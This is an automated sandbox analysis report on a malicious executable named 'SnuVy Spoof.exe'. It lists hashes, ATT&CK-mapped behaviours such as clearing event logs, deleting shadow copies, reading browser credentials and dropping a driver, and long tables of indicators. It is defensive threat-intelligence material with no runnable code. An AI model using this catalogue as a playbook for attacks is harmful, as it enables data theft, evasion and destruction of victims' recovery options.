9d3219f467a2616a7e6844ecbb0df5c5dddf8536d444691bd2c18bb899092eb2

Resubmissions

22-11-2024 04:44

241122-fcs33azrfr 8

22-11-2024 04:11

241122-erzzgstqg1 10

Analysis

max time kernel
150s
max time network
144s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
22-11-2024 04:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SnuVy Spoof.exe
Size

746KB
MD5

65b0e91512cc8d241ecc81dcba75d018
SHA1

3552fd50d9db83ba21abc56c6cd986637c3df51f
SHA256

9d3219f467a2616a7e6844ecbb0df5c5dddf8536d444691bd2c18bb899092eb2
SHA512

5ef4fa0cb5645a2f6582e20f2e21b770737ae2938a8b609131ea6cefef269b938d5b2ca70713af8f071e5d3a04778e5b01a975f4b2e5f44090245c70aed9b017
SSDEEP

12288:qr8DUq79BdXaHsLXqltIRIyr50UaGIdlijbZVIE:qrYUOBp5XqltmP6UaGEkj3

Score

10^/10

defense_evasion discovery evasion execution impact persistence ransomware spyware stealer

Malware Config

Signatures

Deletes NTFS Change Journal 2 TTPs 3 IoCs

The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.

ransomware

Inhibit System Recovery

T1490

Data Destruction

T1485

pid	Process
5844	fsutil.exe
5832	fsutil.exe
5928	fsutil.exe

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Clear Windows Event Logs

T1070.001

pid	Process
6024	wevtutil.exe
1112	wevtutil.exe
4828	wevtutil.exe
1136	wevtutil.exe
4972	wevtutil.exe
5656	wevtutil.exe
4312	wevtutil.exe
4480	wevtutil.exe
4424	Process not Found
1660	Process not Found
5552	wevtutil.exe
4536	wevtutil.exe
4592	Process not Found
3336	wevtutil.exe
3212	wevtutil.exe
2984	wevtutil.exe
5780	wevtutil.exe
1276	Process not Found
224	wevtutil.exe
6032	wevtutil.exe
1828	wevtutil.exe
5256	wevtutil.exe
4880	wevtutil.exe
3772	wevtutil.exe
1352	wevtutil.exe
1948	wevtutil.exe
2676	wevtutil.exe
6020	Process not Found
5196	wevtutil.exe
2556	wevtutil.exe
5672	wevtutil.exe
5524	wevtutil.exe
5700	wevtutil.exe
1552	wevtutil.exe
728	wevtutil.exe
3360	Process not Found
4160	Process not Found
3096	wevtutil.exe
5756	wevtutil.exe
5280	wevtutil.exe
4424	wevtutil.exe
5228	wevtutil.exe
5884	wevtutil.exe
5316	wevtutil.exe
5144	wevtutil.exe
4876	Process not Found
4736	wevtutil.exe
6128	wevtutil.exe
4524	wevtutil.exe
4404	wevtutil.exe
3468	Process not Found
4880	wevtutil.exe
3400	wevtutil.exe
1812	Process not Found
5884	Process not Found
2416	wevtutil.exe
524	wevtutil.exe
5260	wevtutil.exe
1460	wevtutil.exe
2068	wevtutil.exe
2200	Process not Found
5336	wevtutil.exe
4196	wevtutil.exe
2624	Process not Found

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Downloads MZ/PE file

Drops file in Drivers directory 5 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\DRIVERS\UCORESYS.sys	Process not Found
File opened for modification	C:\Windows\SysWOW64\DRIVERS\UCORESYS.sys	Process not Found
File opened for modification	C:\Windows\SysWOW64\DRIVERS\UCORESYS.sys	Process not Found
File opened for modification	C:\Windows\SysWOW64\DRIVERS\UCORESYS.sys	Process not Found
File opened for modification	C:\Windows\SysWOW64\DRIVERS\UCORESYS.sys	Process not Found

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Drops startup file 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	Cleaner8.exe

Executes dropped EXE 13 IoCs

pid	Process
6052	y9cisa.exe
4840	ZRGHJR345.exe
4508	FIXusrTEMPv6.exe
5576	ddc.exe
5628	cleanerOLD1.exe
5672	Cleaner8.exe
2672	AdvancedEventCleaner.exe
3776	Process not Found
3360	Process not Found
3188	Process not Found
1640	Process not Found
5548	Process not Found
4180	Process not Found

Loads dropped DLL 2 IoCs

pid	Process
6052	y9cisa.exe
6052	y9cisa.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Drops desktop.ini file(s) 56 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Public\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini	Cleaner8.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	Cleaner8.exe

Enumerates connected drives 3 TTPs 2 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\D:	fsutil.exe
File opened (read-only)	\??\E:	fsutil.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
21	discord.com
22	discord.com

Power Settings 1 TTPs 1 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1416	wevtutil.exe

Checks system information in the registry 2 TTPs 1 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	ddc.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\restore\MachineGuid.txt	Cleaner8.exe
File opened for modification	C:\Windows\System32\spp\store	Cleaner8.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\5e61f519-f975-4e27-abe8-b487f90df484.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241122041128.pma	setup.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Prefetch\EXPLORER.EXE-A80E4F97.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\MSCORSVW.EXE-57D17DAF.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNTIMEBROKER.EXE-DD81242D.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SEARCHPROTOCOLHOST.EXE-0CB8CADE.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SHUTDOWN.EXE-E7D5C9CC.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SMCONFIGINSTALLER.EXE-EC979AE0.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SVCHOST.EXE-033BBABB.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SVCHOST.EXE-AA27F323.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SVCHOST.EXE-AE7DB802.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\DISMHOST.EXE-B657128B.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\DLLHOST.EXE-504C779A.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\LINQWEBCONFIG.EXE-4A3DBBF6.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\PfPre_72c3c17f.mkd	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\ResPriHMStaticDb.ebd	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\TASKKILL.EXE-8F5B2253.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\AgRobust.db	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\APPLICATIONFRAMEHOST.EXE-CCEEF759.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\AUDIODG.EXE-BDFD3029.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\NGEN.EXE-EC3F9239.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\REG.EXE-E7E8BD26.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SPPSVC.EXE-B0F8131B.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SVCHOST.EXE-F027B880.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SVCHOST.EXE-F7F7800E.pf	Cleaner8.exe
File opened for modification	C:\Windows\INF\setupapi.setup.log	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\CSCRIPT.EXE-D1EF4768.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNTIMEBROKER.EXE-72C0C855.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SVCHOST.EXE-342BD74A.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SVCHOST.EXE-9F4DB6F5.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\TASKHOSTW.EXE-3E0B74C8.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\AgGlGlobalHistory.db	Cleaner8.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\ASPNET_REGIIS.EXE-A5891C91.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SECURITYHEALTHSYSTRAY.EXE-41AD6DE1.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SVCHOST.EXE-4746C5F2.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SVCHOST.EXE-96A7E1CF.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SYSTEMSETTINGS.EXE-01D72268.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\POWERSHELL.EXE-920BBA2A.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\REGSVR32.EXE-D5170E12.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SIHOST.EXE-2C4C53BA.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SRTASKS.EXE-4F77756F.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SVCHOST.EXE-25616620.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SVCHOST.EXE-ACC3F69D.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SVCHOST.EXE-DCBDF9F5.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\WMIPRVSE.EXE-1628051C.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\AgCx_SC4.db	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\BACKGROUNDTASKHOST.EXE-EF420FEE.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\DLLHOST.EXE-766398D2.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SVCHOST.EXE-DF3D779F.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\WFSERVICESREG.EXE-3EE82250.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\CONTROL.EXE-817F8F1D.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\DRVINST.EXE-4CB4314A.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\REGSVR32.EXE-8461DBEE.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SVCHOST.EXE-6CD6E9CE.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SVCHOST.EXE-8E7849D3.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\VSSVC.EXE-B8AFC319.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\DLLHOST.EXE-5E46FA0D.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\DLLHOST.EXE-FC981FFE.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\MICROSOFTEDGEUPDATE.EXE-C4317749.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNTIMEBROKER.EXE-61CEEB31.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\RUNTIMEBROKER.EXE-C648BEC3.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SHELLEXPERIENCEHOST.EXE-E5B36B6A.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\SVCHOST.EXE-8102A33C.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\TAKEOWN.EXE-A80759AD.pf	Cleaner8.exe
File opened for modification	C:\Windows\Prefetch\WFSERVICESREG.EXE-766D3C5B.pf	Cleaner8.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4544	sc.exe
3336	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ddc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cleanerOLD1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	y9cisa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 10 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4888	Process not Found
3392	PING.EXE
4972	PING.EXE
3456	PING.EXE
5220	PING.EXE
5404	Process not Found
2720	PING.EXE
1548	PING.EXE
3768	Process not Found
1416	Process not Found

System Time Discovery 1 TTPs 1 IoCs

Adversary may gather the system time and/or time zone settings from a local or remote system.

discovery

System Time Discovery

T1124

pid	Process
1112	wevtutil.exe

Enumerates system info in registry 2 TTPs 13 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	y9cisa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	y9cisa.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	Cleaner8.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	Cleaner8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	Cleaner8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	y9cisa.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	Cleaner8.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "222faafc-17a54df0-4"	Cleaner8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	Cleaner8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	Cleaner8.exe

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
5104	Process not Found
4668	Process not Found
5768	Process not Found

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
5996	vssadmin.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
1256	taskkill.exe
2368	taskkill.exe
5012	taskkill.exe
3940	taskkill.exe
1520	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Migration\IE Installed Date = e5a84ad5513187d4	Cleaner8.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2319007114-3335580451-2147236418-1000\{B2C41EEC-3B43-42A3-BFA7-9CC10C7BB234}	msedge.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
3480	reg.exe
4084	reg.exe

Runs net.exe

Runs ping.exe 1 TTPs 10 IoCs

Remote System Discovery

T1018

pid	Process
5404	Process not Found
3768	Process not Found
1416	Process not Found
4888	Process not Found
3392	PING.EXE
4972	PING.EXE
5220	PING.EXE
2720	PING.EXE
3456	PING.EXE
1548	PING.EXE

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
780	msedge.exe
780	msedge.exe
2192	msedge.exe
2192	msedge.exe
3408	msedge.exe
3408	msedge.exe
3176	identity_helper.exe
3176	identity_helper.exe
2832	WMIC.exe
2832	WMIC.exe
2832	WMIC.exe
2832	WMIC.exe
5136	WMIC.exe
5136	WMIC.exe
5136	WMIC.exe
5136	WMIC.exe
5628	cleanerOLD1.exe
5628	cleanerOLD1.exe
5672	Cleaner8.exe
5672	Cleaner8.exe
3776	Process not Found
3776	Process not Found

Suspicious behavior: LoadsDriver 8 IoCs

pid	Process
668	Process not Found
668	Process not Found
668	Process not Found
668	Process not Found
668	Process not Found
668	Process not Found
668	Process not Found
668	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
2192	msedge.exe
2192	msedge.exe
2192	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2832	WMIC.exe
Token: SeSecurityPrivilege	2832	WMIC.exe
Token: SeTakeOwnershipPrivilege	2832	WMIC.exe
Token: SeLoadDriverPrivilege	2832	WMIC.exe
Token: SeSystemProfilePrivilege	2832	WMIC.exe
Token: SeSystemtimePrivilege	2832	WMIC.exe
Token: SeProfSingleProcessPrivilege	2832	WMIC.exe
Token: SeIncBasePriorityPrivilege	2832	WMIC.exe
Token: SeCreatePagefilePrivilege	2832	WMIC.exe
Token: SeBackupPrivilege	2832	WMIC.exe
Token: SeRestorePrivilege	2832	WMIC.exe
Token: SeShutdownPrivilege	2832	WMIC.exe
Token: SeDebugPrivilege	2832	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2832	WMIC.exe
Token: SeRemoteShutdownPrivilege	2832	WMIC.exe
Token: SeUndockPrivilege	2832	WMIC.exe
Token: SeManageVolumePrivilege	2832	WMIC.exe
Token: 33	2832	WMIC.exe
Token: 34	2832	WMIC.exe
Token: 35	2832	WMIC.exe
Token: 36	2832	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2832	WMIC.exe
Token: SeSecurityPrivilege	2832	WMIC.exe
Token: SeTakeOwnershipPrivilege	2832	WMIC.exe
Token: SeLoadDriverPrivilege	2832	WMIC.exe
Token: SeSystemProfilePrivilege	2832	WMIC.exe
Token: SeSystemtimePrivilege	2832	WMIC.exe
Token: SeProfSingleProcessPrivilege	2832	WMIC.exe
Token: SeIncBasePriorityPrivilege	2832	WMIC.exe
Token: SeCreatePagefilePrivilege	2832	WMIC.exe
Token: SeBackupPrivilege	2832	WMIC.exe
Token: SeRestorePrivilege	2832	WMIC.exe
Token: SeShutdownPrivilege	2832	WMIC.exe
Token: SeDebugPrivilege	2832	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2832	WMIC.exe
Token: SeRemoteShutdownPrivilege	2832	WMIC.exe
Token: SeUndockPrivilege	2832	WMIC.exe
Token: SeManageVolumePrivilege	2832	WMIC.exe
Token: 33	2832	WMIC.exe
Token: 34	2832	WMIC.exe
Token: 35	2832	WMIC.exe
Token: 36	2832	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5136	WMIC.exe
Token: SeSecurityPrivilege	5136	WMIC.exe
Token: SeTakeOwnershipPrivilege	5136	WMIC.exe
Token: SeLoadDriverPrivilege	5136	WMIC.exe
Token: SeSystemProfilePrivilege	5136	WMIC.exe
Token: SeSystemtimePrivilege	5136	WMIC.exe
Token: SeProfSingleProcessPrivilege	5136	WMIC.exe
Token: SeIncBasePriorityPrivilege	5136	WMIC.exe
Token: SeCreatePagefilePrivilege	5136	WMIC.exe
Token: SeBackupPrivilege	5136	WMIC.exe
Token: SeRestorePrivilege	5136	WMIC.exe
Token: SeShutdownPrivilege	5136	WMIC.exe
Token: SeDebugPrivilege	5136	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5136	WMIC.exe
Token: SeRemoteShutdownPrivilege	5136	WMIC.exe
Token: SeUndockPrivilege	5136	WMIC.exe
Token: SeManageVolumePrivilege	5136	WMIC.exe
Token: 33	5136	WMIC.exe
Token: 34	5136	WMIC.exe
Token: 35	5136	WMIC.exe
Token: 36	5136	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5136	WMIC.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
2192	msedge.exe
2192	msedge.exe
2192	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1156 wrote to memory of 2812	1156	SnuVy Spoof.exe	83
PID 1156 wrote to memory of 2812	1156	SnuVy Spoof.exe	83
PID 2812 wrote to memory of 2192	2812	cmd.exe	84
PID 2812 wrote to memory of 2192	2812	cmd.exe	84
PID 1156 wrote to memory of 232	1156	SnuVy Spoof.exe	86
PID 1156 wrote to memory of 232	1156	SnuVy Spoof.exe	86
PID 2192 wrote to memory of 2396	2192	msedge.exe	87
PID 2192 wrote to memory of 2396	2192	msedge.exe	87
PID 1156 wrote to memory of 2068	1156	SnuVy Spoof.exe	88
PID 1156 wrote to memory of 2068	1156	SnuVy Spoof.exe	88
PID 2068 wrote to memory of 2052	2068	cmd.exe	89
PID 2068 wrote to memory of 2052	2068	cmd.exe	89
PID 2068 wrote to memory of 1952	2068	cmd.exe	90
PID 2068 wrote to memory of 1952	2068	cmd.exe	90
PID 2068 wrote to memory of 684	2068	cmd.exe	91
PID 2068 wrote to memory of 684	2068	cmd.exe	91
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
PID 2192 wrote to memory of 4508	2192	msedge.exe	92
